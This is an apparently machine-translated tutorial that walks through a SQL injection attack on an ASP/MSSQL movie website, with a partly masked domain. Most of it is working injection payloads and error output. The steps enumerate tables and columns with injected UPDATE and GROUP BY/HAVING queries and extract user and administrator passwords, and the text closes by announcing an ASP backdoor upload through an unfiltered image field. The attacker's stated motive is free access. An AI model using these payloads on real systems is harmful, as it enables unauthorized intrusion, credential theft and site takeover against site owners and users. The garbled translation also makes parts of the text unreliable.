New SQL Injection skills

Table Name and field name acquisition
Applicability:
1) The database is MSSQL
2) Only common users are connected to the database.
3) unknown ASP source code

Attacks that can be carried out
1) Add, view, and change data content

Instance:
This document uses

Test attacks for columns.

Step 1:
Enter single quotes at the user name to display
Microsoft ole db provider for SQL Server Error 80040e14
There are unclosed quotation marks before the string.

/User/wantpws. asp, row 63

It indicates that the single quotes are not filtered and the database is MSSQL.

Step 2:
Enter a; use master ;--
Display
Microsoft ole db provider for SQL Server Error 80040e21 multi-step le db operation produces an error. If possible, check the status value of each ole db. No work is completed.

/User/wantpws. asp, row 63
This means you have no permission.

Step 3:
Input: A or name like fff % ;--
A user named FFFF is displayed.

Step 4:
Enter the username
FFFF and 1 <> (select count (email) from [user]); --
Display:
Microsoft ole db provider for SQL Server Error 80040e37
The Object Name User is invalid.

/User/wantpws. asp, row 96

It indicates that there is no table named user. You can try it with users. It also indicates that there is a column named "email.
Input a having 1 = 1 --
Generally, the following table name and field name can be obtained directly.
Microsoft ole db provider for SQL Server Error 80040e14
The users. ID column is invalid in the selection list because it is not included in the aggregate function and has no group by clause.

/User/wantpws. asp, row 63

Now we know that the password of the FFFF user is 111111.

The following statements are used to obtain all table names and field names in the database.

Step 5:
Input:
FFFF; update [users] Set email = (select top 1 name from sysobjects where xtype = u and status> 0) Where name = FFFF ;--
Note:
The preceding statement is used to obtain the first user table in the database and put the table name in the FFFF user's mailbox field.
By viewing the FFFF user information, you can obtain the first table named ad and then obtain the idffff of the table based on the table name ad; update [users] Set email = (select top 1 ID from sysobjects where xtype = u and name = AD) Where name = FFFF ;--
As shown above, the ID is: 581577110 because the object flag IDs are arranged from small to large, we can get the names of all user tables. In this way, we can get the name of the second table. FFFF; update [users] Set email = (select top 1 name from sysobjects where xtype = u and ID> 581577110) Where name = FFFF ;--

Active Directory 581577110
Users' 597577167
Buy 613577224
Car 629577281
Learning 1, 645577338
Logs 661577395
Movie 677577452
Movieurl 693577509
Password 709577566
Type 725577623
Talk

After a period of speculation, we can see from the above analysis that the password and users are the most important

Step 6: Guess important table fields
Input:
Now let's take a look at the fields in the users table.
FFFF; update [users] Set email = (select top 1 col_name (object_id (users), 3) from users) Where name = FFFF ;--
The third field is password.
FFFF; update [users] Set email = (select top 1 col_name (object_id (users), 4) from users) Where name = FFFF ;--
The fourth field is name.
Finally, all 28 fields in the users table are available.
(Note: another method to obtain fields is provided that the system Returns Error information.
A group by ID having 1 = 1 --
Get
Microsoft ole db provider for SQL Server Error 80040e14
The users. userid column is invalid in the selection list because it is neither included in the aggregate function nor in the group by clause.

/User/wantpws. asp, row 63
The second field is userid.
The third field is displayed.
A group by ID, userid having 1 = 1 --

Microsoft ole db provider for SQL Server Error 80040e14
The users. Password column is invalid in the selection list because it is neither included in the aggregate function nor in the group by clause.

/User/wantpws. asp, row 63
The password is obtained.
Similarly, all are displayed. :)
)

Users table
1 2 3 4
Id userid password name

5 6 7 8 9 10 11 12 13 14 15 16
Province homeaddress city adress starlook sex email nlook Nos date money send

17 18 19 20 21 22 23 24 25 26 27 28
Oklook dnlook lasthits phone askmejoin getmoney payno logintime mflag State Post note

Starlook -- 12 10 2003 pm
Nlook --- 0
Nos --- 2 login times
Date -- 12 10 2003 12: 00 am registration time?
Money-Same as above
Send -- null
Oklook -- 0
Dnlook -- 0
Getmoney -- 0
State -- 0
Note -- this guy is very good... Description

Password table
1 2 3
ID name pwd

Then I tried ad to record ad hitting points ..
Then try the password table to obtain the name and PWD fields.
Run
FFFF; update [users] Set email = (select top 1 name from password) Where name = FFFF ;--
The first user name is admin123. Most of them are administrators.
Then we get the password "Dy ***" or "dick188...

In this way, we have completely entered the background of this movie website, haha.
Http://www.dy ***. com/login. asp

You can also see the three-person password of the Administrator.
FFFF; update [users] Set email = (select top 1 count (ID) from password) Where name = FFFF ;--
FFFF; update [users] Set email = (select top 1 PWD from password where id = 2) Where name = FFFF ;--

FFFF; update [users] Set email = (select top 1 name from password where id = 2) Where name = FFFF ;--

It's not enough to watch movies for free .. I looked at its background management and found that the uploaded images were not filtered at the place where the movie was added. so that I can upload an ASP backdoor and execute